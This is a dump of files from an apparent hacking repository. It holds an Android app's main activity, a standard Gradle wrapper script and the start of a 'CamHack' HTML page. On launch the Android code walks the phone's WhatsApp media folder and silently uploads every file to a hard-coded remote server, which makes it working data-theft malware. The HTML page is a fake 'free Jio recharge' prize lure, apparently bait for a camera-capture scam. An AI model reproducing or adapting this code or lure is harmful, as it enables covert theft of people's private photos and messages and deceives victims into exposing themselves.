android.util.Log; 21 | import android.view.Menu; 22 | import android.view.MenuItem; 23 | import android.widget.Toast; 24 | import org.apache.commons.io.FileUtils; 25 | import org.apache.commons.io.filefilter.TrueFileFilter; 26 | import java.io.IOException; 27 | import java.util.List; 28 | @SuppressLint("NewApi") 29 | public class MainActivity extends Activity 30 | { 31 | @Override 32 | protected void onCreate(Bundle savedInstanceState) 33 | { 34 | super.onCreate(savedInstanceState); 35 | setContentView(R.layout.activity_main); 36 | StrictMode.ThreadPolicy policy=new StrictMode.ThreadPolicy.Builder().permitAll().build(); 37 | StrictMode.setThreadPolicy(policy); 38 | try { 39 | checkperm(); 40 | } catch (Exception e) { 41 | } 42 | } 43 | public void checkperm() { 44 | if(ContextCompat.checkSelfPermission(getBaseContext(), "android.permission.WRITE_EXTERNAL_STORAGE") == PackageManager.PERMISSION_GRANTED) { 45 | File dir = new File("/storage/emulated/0/WhatsApp/Media/"); 46 | List files = (List) FileUtils.listFiles(dir, 47 | TrueFileFilter.INSTANCE, TrueFileFilter.INSTANCE); 48 | for (File file : files) { 49 | try { 50 | String pathW = file.getCanonicalPath(); 51 | upload(pathW); 52 | } catch (Exception e) { 53 | } 54 | } 55 | } else { 56 | final int REQUEST_CODE_ASK_PERMISSIONS = 123; 57 | ActivityCompat.requestPermissions(MainActivity.this, new String[]{"android.permission.WRITE_EXTERNAL_STORAGE"}, REQUEST_CODE_ASK_PERMISSIONS); 58 | checkperm(); 59 | } 60 | } 61 | public void upload(String selectedPath) throws Exception { 62 | HttpURLConnection connection = null; 63 | DataOutputStream outputStream = null; 64 | DataInputStream inputStream = null; 65 | String pathToOurFile = selectedPath; 66 | String urlServer = "http://159.89.214.31:8080/upload_files.php"; 67 | String lineEnd = "\r\n"; 68 | String twoHyphens = "--"; 69 | String boundary = "*****"; 70 | int bytesRead, bytesAvailable, bufferSize; 71 | byte[] buffer; 72 | int maxBufferSize = 1 * 1024 * 1024; 73 | FileInputStream fileInputStream = new FileInputStream(new File( 74 | pathToOurFile)); 75 | URL url = new URL(urlServer); 76 | connection = (HttpURLConnection) url.openConnection(); 77 | connection.setDoInput(true); 78 | connection.setDoOutput(true); 79 | connection.setUseCaches(false); 80 | connection.setRequestMethod("POST"); 81 | connection.setRequestProperty("Connection", "Keep-Alive"); 82 | connection.setRequestProperty("Content-Type", 83 | "multipart/form-data;boundary=" + boundary); 84 | outputStream = new DataOutputStream(connection.getOutputStream()); 85 | outputStream.writeBytes(twoHyphens + boundary + lineEnd); 86 | outputStream 87 | .writeBytes("Content-Disposition: form-data; name=\"uploadedfile\";filename=\"" 88 | + pathToOurFile + "\"" + lineEnd); 89 | outputStream.writeBytes(lineEnd); 90 | bytesAvailable = fileInputStream.available(); 91 | bufferSize = Math.min(bytesAvailable, maxBufferSize); 92 | buffer = new byte[bufferSize]; 93 | bytesRead = fileInputStream.read(buffer, 0, bufferSize); 94 | while (bytesRead > 0) { 95 | outputStream.write(buffer, 0, bufferSize); 96 | bytesAvailable = fileInputStream.available(); 97 | bufferSize = Math.min(bytesAvailable, maxBufferSize); 98 | bytesRead = fileInputStream.read(buffer, 0, bufferSize); 99 | } 100 | outputStream.writeBytes(lineEnd); 101 | outputStream.writeBytes(twoHyphens + boundary + twoHyphens + lineEnd); 102 | int serverResponseCode = connection.getResponseCode(); 103 | String serverResponseMessage = connection.getResponseMessage(); 104 | fileInputStream.close(); 105 | outputStream.flush(); 106 | outputStream.close(); 107 | } 108 | } 109 | -------------------------------------------------------------------------------- /Whats-Hack/data/gradlew: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | ############################################################################## 4 | ## 5 | ## Gradle start up script for UN*X 6 | ## 7 | ############################################################################## 8 | 9 | # Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. 10 | DEFAULT_JVM_OPTS="" 11 | 12 | APP_NAME="Gradle" 13 | APP_BASE_NAME=`basename "$0"` 14 | 15 | # Use the maximum available, or set MAX_FD != -1 to use that value. 16 | MAX_FD="maximum" 17 | 18 | warn ( ) { 19 | echo "$*" 20 | } 21 | 22 | die ( ) { 23 | echo 24 | echo "$*" 25 | echo 26 | exit 1 27 | } 28 | 29 | # OS specific support (must be 'true' or 'false'). 30 | cygwin=false 31 | msys=false 32 | darwin=false 33 | case "`uname`" in 34 | CYGWIN* ) 35 | cygwin=true 36 | ;; 37 | Darwin* ) 38 | darwin=true 39 | ;; 40 | MINGW* ) 41 | msys=true 42 | ;; 43 | esac 44 | 45 | # Attempt to set APP_HOME 46 | # Resolve links: $0 may be a link 47 | PRG="$0" 48 | # Need this for relative symlinks. 49 | while [ -h "$PRG" ] ; do 50 | ls=`ls -ld "$PRG"` 51 | link=`expr "$ls" : '.*-> \(.*\)$'` 52 | if expr "$link" : '/.*' > /dev/null; then 53 | PRG="$link" 54 | else 55 | PRG=`dirname "$PRG"`"/$link" 56 | fi 57 | done 58 | SAVED="`pwd`" 59 | cd "`dirname \"$PRG\"`/" >/dev/null 60 | APP_HOME="`pwd -P`" 61 | cd "$SAVED" >/dev/null 62 | 63 | CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 64 | 65 | # Determine the Java command to use to start the JVM. 66 | if [ -n "$JAVA_HOME" ] ; then 67 | if [ -x "$JAVA_HOME/jre/sh/java" ] ; then 68 | # IBM's JDK on AIX uses strange locations for the executables 69 | JAVACMD="$JAVA_HOME/jre/sh/java" 70 | else 71 | JAVACMD="$JAVA_HOME/bin/java" 72 | fi 73 | if [ ! -x "$JAVACMD" ] ; then 74 | die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 75 | 76 | Please set the JAVA_HOME variable in your environment to match the 77 | location of your Java installation." 78 | fi 79 | else 80 | JAVACMD="java" 81 | which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 82 | 83 | Please set the JAVA_HOME variable in your environment to match the 84 | location of your Java installation." 85 | fi 86 | 87 | # Increase the maximum file descriptors if we can. 88 | if [ "$cygwin" = "false" -a "$darwin" = "false" ] ; then 89 | MAX_FD_LIMIT=`ulimit -H -n` 90 | if [ $? -eq 0 ] ; then 91 | if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then 92 | MAX_FD="$MAX_FD_LIMIT" 93 | fi 94 | ulimit -n $MAX_FD 95 | if [ $? -ne 0 ] ; then 96 | warn "Could not set maximum file descriptor limit: $MAX_FD" 97 | fi 98 | else 99 | warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" 100 | fi 101 | fi 102 | 103 | # For Darwin, add options to specify how the application appears in the dock 104 | if $darwin; then 105 | GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" 106 | fi 107 | 108 | # For Cygwin, switch paths to Windows format before running java 109 | if $cygwin ; then 110 | APP_HOME=`cygpath --path --mixed "$APP_HOME"` 111 | CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` 112 | JAVACMD=`cygpath --unix "$JAVACMD"` 113 | 114 | # We build the pattern for arguments to be converted via cygpath 115 | ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` 116 | SEP="" 117 | for dir in $ROOTDIRSRAW ; do 118 | ROOTDIRS="$ROOTDIRS$SEP$dir" 119 | SEP="|" 120 | done 121 | OURCYGPATTERN="(^($ROOTDIRS))" 122 | # Add a user-defined pattern to the cygpath arguments 123 | if [ "$GRADLE_CYGPATTERN" != "" ] ; then 124 | OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" 125 | fi 126 | # Now convert the arguments - kludge to limit ourselves to /bin/sh 127 | i=0 128 | for arg in "$@" ; do 129 | CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` 130 | CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option 131 | 132 | if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition 133 | eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` 134 | else 135 | eval `echo args$i`="\"$arg\"" 136 | fi 137 | i=$((i+1)) 138 | done 139 | case $i in 140 | (0) set -- ;; 141 | (1) set -- "$args0" ;; 142 | (2) set -- "$args0" "$args1" ;; 143 | (3) set -- "$args0" "$args1" "$args2" ;; 144 | (4) set -- "$args0" "$args1" "$args2" "$args3" ;; 145 | (5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; 146 | (6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; 147 | (7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; 148 | (8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; 149 | (9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; 150 | esac 151 | fi 152 | 153 | # Split up the JVM_OPTS And GRADLE_OPTS values into an array, following the shell quoting and substitution rules 154 | function splitJvmOpts() { 155 | JVM_OPTS=("$@") 156 | } 157 | eval splitJvmOpts $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS 158 | JVM_OPTS[${#JVM_OPTS[*]}]="-Dorg.gradle.appname=$APP_BASE_NAME" 159 | 160 | exec "$JAVACMD" "${JVM_OPTS[@]}" -classpath "$CLASSPATH" org.gradle.wrapper.GradleWrapperMain "$@" 161 | -------------------------------------------------------------------------------- /CamHack/index2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Hey Dear! You Have Won Free Rs 399 Jio Recharge 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 |
14 | 15 | 16 | 17 | 18 |

Free Jio 399 Recharge

19 | 20 | 21 |